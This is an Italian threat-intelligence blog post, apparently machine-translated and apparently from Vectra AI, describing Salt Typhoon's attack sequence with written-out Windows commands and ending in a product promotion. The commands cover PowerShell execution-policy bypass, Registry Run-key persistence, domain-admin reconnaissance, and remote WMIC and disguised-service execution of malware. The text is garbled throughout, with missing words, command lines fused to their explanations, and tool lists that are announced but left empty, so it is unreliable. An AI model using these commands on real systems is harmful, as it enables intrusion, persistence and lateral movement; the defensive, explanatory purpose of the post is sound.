Salt Typhoon una sequenza di attacco strutturata utilizzando strumenti Windows integrati per evitare il rilevamento. Ecco una panoramica delle loro tattiche e dei comandi che utilizzano.
Salt Typhoon sfrutta Salt Typhoon server pubblici con vulnerabilità note. Anziché ricorrere al phishing, preferisce zero-day N-day e zero-day per ottenere l'esecuzione di codice remoto (RCE).
Una volta ottenuto l'accesso, eseguono payload dannosi e garantiscono la persistenza utilizzando gli strumenti di Windows.
Utilizzano PowerShell per eseguire script senza restrizioni:
powershell -ex bypass -c "<password>"-ex bypass: Ignora i criteri di esecuzione per consentire l'esecuzione dello script.<password>: Chiave utilizzata per decriptare lo script, che solitamente è criptato.Per garantire che malware ogni volta che un utente accede al sistema, aggiungono una chiave di registro:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f"HKCU\Software\Microsoft\Windows\CurrentVersion\Run": Posizione del registro per i programmi ad avvio automatico.REG_SZ: Specifica un valore stringa (il malware )./f: Forza l'esecuzione senza conferma.Salt Typhoon informazioni sull'ambiente prima di aumentare i privilegi.
wmic process get name,processid,commandlinegruppo netto Identificare gli amministratori di dominiocmd /c "net group 'amministratori di dominio' /dominio"/dominio: Assicura che la query venga applicata al dominio Active Directory anziché solo al computer locale.Dopo la ricognizione, aumentano i privilegi e rubano le credenziali.
Installano strumenti come:
Essi implementano Cobalt Strike, uno strumento legittimo di red teaming, per ottenere privilegi di SISTEMA e addentrarsi maggiormente nella rete.
Salt Typhoon nella rete utilizzando varie utilità di Windows.
copy \\<target_ip>\C$\Windows\Temp\malware.bat\\<target_ip> per specificare una cartella condivisa su un altro computer..bat) da eseguire in remoto.wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"/node:<target_ip>: Specifica il macchina di destinazione.crea chiamata di processo: Esegue un processo in remoto.cmd /c: Esegue il file batch copiato.crea sc)sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= ownsc: Utilità di controllo dei servizi Windows.\\<target_ip>: Crea il servizio da remoto su un altro computer.VGAuthtools: Camuffa malware uno strumento legittimo.percorso del cestino: Usi installutil.exe (a strumento Windows legittimo) per eseguire il payload dannoso.inizio= automatico: Assicura la persistenza riavviando il malware volta che il computer viene riavviato.Salt Typhoon una comunicazione persistente con i propri server C2.
Salt Typhoon essere individuato utilizzando piattaforme affidabili per caricare i dati rubati:
Salt Typhoon monitora Salt Typhoon le reti compromesse e ruba dati sensibili per un periodo prolungato.
----
La piattaforma Vectra AIsi concentra sui comportamenti di attacco reali, non solo sulle minacce note. Ciò le consente di rilevare attivitàSalt Typhoon anche quando gli aggressori utilizzano strumenti Windows integrati.
Scopri di più sui nostri sistemi di rilevamento basati sull'intelligenza artificiale o prova la nostra demo autoguidata.